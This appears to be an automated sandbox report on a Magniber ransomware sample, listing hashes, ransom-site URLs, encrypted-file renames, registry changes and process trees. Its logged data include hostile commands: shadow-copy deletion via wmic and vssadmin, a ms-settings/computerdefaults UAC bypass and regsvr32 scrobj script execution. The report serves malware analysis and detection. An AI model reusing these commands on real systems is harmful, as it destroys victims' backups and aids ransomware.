Analysis

max time kernel: 138s
max time network: 123s
platform: windows10_x64
resource: win10v20210408
submitted: 09-07-2021 15:55

Static task: static1
Behavioral task: behavioral1
    Sample: 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
    Resource: win7v20210408
Behavioral task: behavioral2
    Sample: 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
    Resource: win10v20210408

General

Target: 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
Size: 22KB
MD5: 7906dc475a8ae55ffb5af7fd3ac8f10a
SHA1: e7304e2436dc0eddddba229f1ec7145055030151
SHA256: 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367
SHA512: c087b3107295095e9aca527d02b74c067e96ca5daf5457e465f8606dbf4809027faedf65d77868f6fb8bb91a1438e3d0169e59efddf1439bbd3adb3e23a739a1
Malware Config

Extracted from: C:\Users\Admin\Desktop\readme.txt
Family: magniber
URLs:
- http://2cd0a240c4b06a607eltalkfzj.n5fnrf4l7bdjhelx.onion/eltalkfzj
- http://2cd0a240c4b06a607eltalkfzj.jobsbig.cam/eltalkfzj
- http://2cd0a240c4b06a607eltalkfzj.boxgas.icu/eltalkfzj
- http://2cd0a240c4b06a607eltalkfzj.sixsees.club/eltalkfzj
- http://2cd0a240c4b06a607eltalkfzj.nowuser.casa/eltalkfzj
Signatures

Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
Process spawned unexpected child process (14 IoCs)
This typically indicates the parent process was compromised via an exploit or macro.

description | pid | pid_target | Process | procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4904 | 3616 | cmd.exe | 47
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4896 | 3616 | cmd.exe | 47
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4888 | 3616 | cmd.exe | 47
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4976 | 3616 | cmd.exe | 47
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4992 | 3616 | cmd.exe | 47
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4984 | 3616 | cmd.exe | 47
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4968 | 3616 | cmd.exe | 47
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4960 | 3616 | cmd.exe | 47
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4944 | 3616 | cmd.exe | 47
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4928 | 3616 | cmd.exe | 47
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4936 | 3616 | cmd.exe | 47
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4920 | 3616 | cmd.exe | 47
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4912 | 3616 | cmd.exe | 47
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4880 | 3616 | cmd.exe | 47
Modifies extensions of user files (8 IoCs)
Ransomware generally changes the extension on encrypted files.

description | ioc | Process
File renamed | C:\Users\Admin\Pictures\ExitDebug.crw => C:\Users\Admin\Pictures\ExitDebug.crw.eltalkfzj | sihost.exe
File renamed | C:\Users\Admin\Pictures\RemoveRegister.raw => C:\Users\Admin\Pictures\RemoveRegister.raw.eltalkfzj | sihost.exe
File renamed | C:\Users\Admin\Pictures\DenyReset.tif => C:\Users\Admin\Pictures\DenyReset.tif.eltalkfzj | sihost.exe
File opened for modification | C:\Users\Admin\Pictures\MergeCompare.tiff | sihost.exe
File renamed | C:\Users\Admin\Pictures\MergeCompare.tiff => C:\Users\Admin\Pictures\MergeCompare.tiff.eltalkfzj | sihost.exe
File renamed | C:\Users\Admin\Pictures\MountDismount.tif => C:\Users\Admin\Pictures\MountDismount.tif.eltalkfzj | sihost.exe
File renamed | C:\Users\Admin\Pictures\ConvertToSend.crw => C:\Users\Admin\Pictures\ConvertToSend.crw.eltalkfzj | sihost.exe
File renamed | C:\Users\Admin\Pictures\DismountSplit.raw => C:\Users\Admin\Pictures\DismountSplit.raw.eltalkfzj | sihost.exe
Suspicious use of SetThreadContext (6 IoCs)

description | pid | Process | procid_target
PID 996 set thread context of 2364 | 996 | 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe | 23
PID 996 set thread context of 2376 | 996 | 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe | 28
PID 996 set thread context of 2528 | 996 | 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe | 36
PID 996 set thread context of 2180 | 996 | 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe | 42
PID 996 set thread context of 3528 | 996 | 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe | 52
PID 996 set thread context of 3816 | 996 | 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe | 51
Program crash (1 IoCs)

pid | pid_target | Process | procid_target
3824 | 3816 | WerFault.exe | 51
Modifies registry class (29 IoCs)

description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell | sihost.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" | svchost.exe
Key created | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command | 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" | RuntimeBroker.exe
Key created | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open | sihost.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" | sihost.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" | svchost.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" | 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
Key created | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command | sihost.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" | 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" | svchost.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" | sihost.exe
Key created | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command | taskhostw.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" | taskhostw.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" | taskhostw.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance | Explorer.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" | RuntimeBroker.exe
Key created | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command | Explorer.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" | Explorer.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" | Explorer.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" | taskhostw.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" | 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
Key created | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command | RuntimeBroker.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" | Explorer.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" | sihost.exe
Key created | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings | sihost.exe
Key created | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command | svchost.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" | RuntimeBroker.exe
Opens file in notepad (likely ransom note) (1 IoCs)

pid | Process
576 | notepad.exe
Suspicious behavior: EnumeratesProcesses (20 IoCs)

pid | Process
996 | 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
996 | 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
3824 | WerFault.exe (this row is repeated 18 times in the report)
Suspicious behavior: GetForegroundWindowSpam (1 IoCs)

pid | Process
2180 | Explorer.EXE
Suspicious behavior: MapViewOfSection (6 IoCs)

pid | Process
996 | 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe (this row is repeated 6 times in the report)
Suspicious use of AdjustPrivilegeToken (64 IoCs)

description | pid | Process
Token: SeShutdownPrivilege | 2180 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 2180 | Explorer.EXE
(the two rows above alternate throughout the 64 entries, 32 of each)
Suspicious use of FindShellTrayWindow (8 IoCs)

pid | Process
2180 | Explorer.EXE (this row is repeated 8 times in the report)
Suspicious use of SendNotifyMessage (1 IoCs)

pid | Process
2180 | Explorer.EXE
Suspicious use of UnmapMainImage (1 IoCs)

pid | Process
2180 | Explorer.EXE
Suspicious use of WriteProcessMemory (64 IoCs)
(each row below appears twice in the report, giving 64 entries)

description | pid | Process | procid_target
PID 2364 wrote to memory of 576 | 2364 | sihost.exe | 77
PID 2364 wrote to memory of 2700 | 2364 | sihost.exe | 78
PID 2364 wrote to memory of 3520 | 2364 | sihost.exe | 80
PID 2364 wrote to memory of 496 | 2364 | sihost.exe | 81
PID 2528 wrote to memory of 3716 | 2528 | taskhostw.exe | 84
PID 2528 wrote to memory of 2112 | 2528 | taskhostw.exe | 85
PID 2376 wrote to memory of 3912 | 2376 | svchost.exe | 88
PID 2376 wrote to memory of 2504 | 2376 | svchost.exe | 89
PID 996 wrote to memory of 2348 | 996 | 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe | 92
PID 996 wrote to memory of 2332 | 996 | 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe | 93
PID 996 wrote to memory of 804 | 996 | 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe | 96
PID 996 wrote to memory of 204 | 996 | 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe | 97
PID 3528 wrote to memory of 8 | 3528 | RuntimeBroker.exe | 100
PID 3528 wrote to memory of 492 | 3528 | RuntimeBroker.exe | 101
PID 2180 wrote to memory of 2508 | 2180 | Explorer.EXE | 104
PID 2180 wrote to memory of 3652 | 2180 | Explorer.EXE | 106
PID 3520 wrote to memory of 4128 | 3520 | cmd.exe | 109
PID 2112 wrote to memory of 4148 | 2112 | cmd.exe | 108
PID 3716 wrote to memory of 4164 | 3716 | cmd.exe | 110
PID 496 wrote to memory of 4176 | 496 | cmd.exe | 111
PID 2508 wrote to memory of 4340 | 2508 | cmd.exe | 112
PID 492 wrote to memory of 4352 | 492 | cmd.exe | 113
PID 3912 wrote to memory of 4368 | 3912 | cmd.exe | 115
PID 804 wrote to memory of 4380 | 804 | cmd.exe | 114
PID 2332 wrote to memory of 4420 | 2332 | cmd.exe | 116
PID 204 wrote to memory of 4432 | 204 | cmd.exe | 121
PID 2348 wrote to memory of 4444 | 2348 | cmd.exe | 120
PID 8 wrote to memory of 4456 | 8 | cmd.exe | 119
PID 3652 wrote to memory of 4468 | 3652 | cmd.exe | 117
PID 2504 wrote to memory of 4476 | 2504 | cmd.exe | 118
PID 4960 wrote to memory of 5316 | 4960 | cmd.exe | 153
PID 4880 wrote to memory of 5328 | 4880 | cmd.exe | 151
Processes
(process tree; child processes are indented under their parent)

c:\windows\system32\sihost.exe
    command line: sihost.exe
    PID: 2364
    - Modifies extensions of user files
    - Modifies registry class
    - Suspicious use of WriteProcessMemory

    \??\c:\windows\system32\notepad.exe
        command line: notepad.exe C:\Users\Public\readme.txt
        PID: 576
        - Opens file in notepad (likely ransom note)

    \??\c:\windows\system32\cmd.exe
        command line: cmd /c "start http://2cd0a240c4b06a607eltalkfzj.jobsbig.cam/eltalkfzj^&1^&58789187^&71^&283^&2215063"
        PID: 2700

    \??\c:\windows\system32\cmd.exe
        command line: cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
        PID: 3520
        - Suspicious use of WriteProcessMemory

        C:\Windows\system32\wbem\WMIC.exe
            command line: C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
            PID: 4128

    \??\c:\windows\system32\cmd.exe
        command line: cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
        PID: 496
        - Suspicious use of WriteProcessMemory

        C:\Windows\system32\wbem\WMIC.exe
            command line: C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
            PID: 4176

c:\windows\system32\svchost.exe
    command line: c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
    PID: 2376
    - Modifies registry class
    - Suspicious use of WriteProcessMemory

    \??\c:\windows\system32\cmd.exe
        command line: cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
        PID: 3912
        - Suspicious use of WriteProcessMemory

        C:\Windows\system32\wbem\WMIC.exe
            command line: C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
            PID: 4368

    \??\c:\windows\system32\cmd.exe
        command line: cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
        PID: 2504
        - Suspicious use of WriteProcessMemory

        C:\Windows\system32\wbem\WMIC.exe
            command line: C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
            PID: 4476

c:\windows\system32\taskhostw.exe
    command line: taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
    PID: 2528
    - Modifies registry class
    - Suspicious use of WriteProcessMemory

    \??\c:\windows\system32\cmd.exe
        command line: cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
        PID: 3716
        - Suspicious use of WriteProcessMemory

        C:\Windows\system32\wbem\WMIC.exe
            command line: C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
            PID: 4164

    \??\c:\windows\system32\cmd.exe
        command line: cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
        PID: 2112
        - Suspicious use of WriteProcessMemory

        C:\Windows\system32\wbem\WMIC.exe
            command line: C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
            PID: 4148

C:\Windows\Explorer.EXE
    command line: C:\Windows\Explorer.EXE
    PID: 2180
    - Modifies registry class
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of UnmapMainImage
    - Suspicious use of WriteProcessMemory

    C:\Users\Admin\AppData\Local\Temp\1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
        command line: "C:\Users\Admin\AppData\Local\Temp\1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe"
        PID: 996
        - Suspicious use of SetThreadContext
        - Modifies registry class
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious behavior: MapViewOfSection
        - Suspicious use of WriteProcessMemory

        C:\Windows\SYSTEM32\cmd.exe
            command line: cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
            PID: 2348
            - Suspicious use of WriteProcessMemory

            C:\Windows\system32\wbem\WMIC.exe
                command line: C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
                PID: 4444

        C:\Windows\SYSTEM32\cmd.exe
            command line: cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
            PID: 2332
            - Suspicious use of WriteProcessMemory

            C:\Windows\system32\wbem\WMIC.exe
                command line: C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
                PID: 4420

        C:\Windows\SYSTEM32\cmd.exe
            command line: cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
            PID: 804
            - Suspicious use of WriteProcessMemory

            C:\Windows\system32\wbem\WMIC.exe
                command line: C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
                PID: 4380

        C:\Windows\SYSTEM32\cmd.exe
            command line: cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
            PID: 204
            - Suspicious use of WriteProcessMemory

            C:\Windows\system32\wbem\WMIC.exe
                command line: C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
                PID: 4432

    C:\Windows\system32\cmd.exe
        command line: cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
        PID: 2508
        - Suspicious use of WriteProcessMemory

        C:\Windows\system32\wbem\WMIC.exe
            command line: C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
            PID: 4340

    C:\Windows\system32\cmd.exe
        command line: cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
        PID: 3652
        - Suspicious use of WriteProcessMemory

        C:\Windows\system32\wbem\WMIC.exe
            command line: C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
            PID: 4468

C:\Windows\system32\DllHost.exe
    command line: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
    PID: 3816

    C:\Windows\system32\WerFault.exe
        command line: C:\Windows\system32\WerFault.exe -u -p 3816 -s 836
        PID: 3824
        - Program crash
        - Suspicious behavior: EnumeratesProcesses

C:\Windows\System32\RuntimeBroker.exe
    command line: C:\Windows\System32\RuntimeBroker.exe -Embedding
    PID: 3528
    - Modifies registry class
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\cmd.exe
        command line: cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
        PID: 8
        - Suspicious use of WriteProcessMemory

        C:\Windows\system32\wbem\WMIC.exe
            command line: C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
            PID: 4456

    C:\Windows\System32\cmd.exe
        command line: cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
        PID: 492
        - Suspicious use of WriteProcessMemory

        C:\Windows\system32\wbem\WMIC.exe
            command line: C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
            PID: 4352

C:\Windows\system32\cmd.exe
    command line: cmd /c computerdefaults.exe
    PID: 4904
    - Process spawned unexpected child process

    C:\Windows\system32\ComputerDefaults.exe
        command line: computerdefaults.exe
        PID: 5496

C:\Windows\system32\cmd.exe
    command line: cmd /c computerdefaults.exe
    PID: 4896
    - Process spawned unexpected child process

    C:\Windows\system32\ComputerDefaults.exe
        command line: computerdefaults.exe
        PID: 5508

C:\Windows\system32\cmd.exe
    command line: cmd /c computerdefaults.exe
    PID: 4888
    - Process spawned unexpected child process

    C:\Windows\system32\ComputerDefaults.exe
        command line: computerdefaults.exe
        PID: 5420

C:\Windows\system32\cmd.exe
    command line: cmd /c computerdefaults.exe
    PID: 4976
    - Process spawned unexpected child process

    C:\Windows\system32\ComputerDefaults.exe
        command line: computerdefaults.exe
        PID: 5444

C:\Windows\system32\cmd.exe
    command line: cmd /c computerdefaults.exe
    PID: 4992
    - Process spawned unexpected child process

    C:\Windows\system32\ComputerDefaults.exe
        command line: computerdefaults.exe
        PID: 5448

C:\Windows\system32\cmd.exe
    command line: cmd /c computerdefaults.exe
    PID: 4984
    - Process spawned unexpected child process

    C:\Windows\system32\ComputerDefaults.exe
        command line: computerdefaults.exe
        PID: 5468

C:\Windows\system32\cmd.exe
    command line: cmd /c computerdefaults.exe
    PID: 4968
    - Process spawned unexpected child process

    C:\Windows\system32\ComputerDefaults.exe
        command line: computerdefaults.exe
        PID: 5388

C:\Windows\system32\cmd.exe
    command line: cmd /c computerdefaults.exe
    PID: 4960
    - Process spawned unexpected child process
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\ComputerDefaults.exe
        command line: computerdefaults.exe
        PID: 5316

C:\Windows\system32\cmd.exe
    command line: cmd /c computerdefaults.exe
    PID: 4944
    - Process spawned unexpected child process

    C:\Windows\system32\ComputerDefaults.exe
        command line: computerdefaults.exe
        PID: 5516

C:\Windows\system32\cmd.exe
    command line: cmd /c computerdefaults.exe
    PID: 4928
    - Process spawned unexpected child process

    C:\Windows\system32\ComputerDefaults.exe
        command line: computerdefaults.exe
        PID: 5336

C:\Windows\system32\cmd.exe
    command line: cmd /c computerdefaults.exe
    PID: 4936
    - Process spawned unexpected child process

    C:\Windows\system32\ComputerDefaults.exe
        command line: computerdefaults.exe
        PID: 5484

C:\Windows\system32\cmd.exe
    command line: cmd /c computerdefaults.exe
    PID: 4920
    - Process spawned unexpected child process

    C:\Windows\system32\ComputerDefaults.exe
        command line: computerdefaults.exe
        PID: 5400

C:\Windows\system32\cmd.exe
    command line: cmd /c computerdefaults.exe
    PID: 4912
    - Process spawned unexpected child process

    C:\Windows\system32\ComputerDefaults.exe
        command line: computerdefaults.exe
        PID: 5352

C:\Windows\system32\cmd.exe
    command line: cmd /c computerdefaults.exe
    PID: 4880
    - Process spawned unexpected child process
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\ComputerDefaults.exe
        command line: computerdefaults.exe
        PID: 5328